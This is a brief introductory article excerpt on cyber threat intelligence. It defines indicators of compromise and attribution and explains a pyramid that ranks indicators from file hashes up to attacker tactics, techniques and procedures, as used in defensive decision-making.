Threat intelligence (TI) is at the maturity level to become a decision making tool. TI refers to evidence based information including context such as mechanisms, Indicators of Compromise (IOC), Indicators of Attribution (IOA), implications and actionable advice about existing or emerging hazards to assets. TI allows the technical staff professionals to make better decisions and take action accordingly.
Historically, intelligence tactics, techniques & procedures (TTPs), as well as various types of intelligence operations, existed long before cyberspace was conceived. Intelligence is often seen as “offensive” in nature when viewed through the lens of spying. The ultimate purpose of TI is actually to enable the CISO or the CIO to make a decision based on evidence and the SOC entities to defend against attack before is materialized.
There is a correlation between the type of the IOC’s, the potential of usefulness and difficulty to obtain the necessary data. The base of the pyramid starts with unique signatures of files such as MD5, SHA1 etc. While they are easy to find and share, they are less effective in the long run. On the other hand, the top of the pyramid refers to TTPs, which are more complicated to find and learn, but much more effective in deface prospective.
To read the original article: